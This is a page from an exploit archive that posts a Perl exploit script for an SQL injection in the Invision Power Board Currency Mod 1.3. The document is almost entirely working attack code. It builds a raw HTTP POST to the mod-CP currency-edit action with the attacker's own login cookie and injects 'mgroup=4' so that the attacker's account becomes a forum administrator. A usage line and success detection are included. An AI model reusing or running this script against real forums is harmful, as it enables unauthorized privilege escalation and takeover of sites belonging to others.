Home / os / winme

ipbcurrency-sql.txt

Posted on 12 March 2010

# Exploit Title: Invision Power Board Currency Mod(edit) SQL injection # Date: 17/04/2007 # Author: Pr0T3cT10n # Software Link: www.invisionpower.com<http://www.invisionpower.com> # Version: 1.3 # Tested on: 1.3 # CVE: # Code: #!/usr/bin/perl ######################################################################### # Invision Power Board Currency Mod(edit) SQL injection. # # Bug found by Pr0T3cT10n, pr0t3ct10n@gmail.com<mailto:pr0t3ct10n@gmail.com> # # The exploit is updating your user to an admin account # # **YOU SHOULD HAVE CURRENCY EDIT ACCESS!** # ######################################################################### use IO::Socket; use Digest::MD5 qw(md5_hex); $host = $ARGV[0]; $path = $ARGV[1]; $id = $ARGV[2]; $passwd = $ARGV[3]; if(!$ARGV[3]) { print "################################################# "; print "## IPB Currency Mod SQL injection Exploit. ## "; print "## Discoverd By Pr0T3cT10n. ## "; print "################################################# "; print "$0 [host] [path] [your id] [your passowrd] "; print "$0 host.com /forum 567 123456 "; print "################################################# "; exit(); } print "[~] Connecting $host:80... "; $socket = IO::Socket::INET->new( Proto => "tcp" , PeerAddr => $host , PeerPort => "80") or die("[-] Connection faild. "); print "[+] Connected. [~] Sending POST information... "; $pack.= "POST " . $path . "/index.php?act=modcp&CODE=docurrencyedit&memberid=" . $id . " HTTP/1.1 "; $pack.= "Host: " . $host . " "; $pack.= "User-Agent: No_Agent "; $pack.= "Accept: */* "; $pack.= "Cookie: member_id=" .$id. "; pass_hash=" .md5_hex($passwd). " "; $pack.= "Keep-Alive: 300 "; $pack.= "Connection: keep-alive "; $pack.= "Content-Type: application/x-www-form-urlencoded "; $pack.= "Content-Length: 24 "; $pack.= "currency=1%20%2Cmgroup=4"; #UPDATE ibf_members SET currency=1 ,mgroup=4 WHERE id='$id' print $socket $pack; while($res = <$socket>) { if($res =~ /<table align='center' cellpadding="4" class="tablefill">/) { print("[+] succeed. "); exit(); } } print("[-] Faild. "); exit();

 

TOP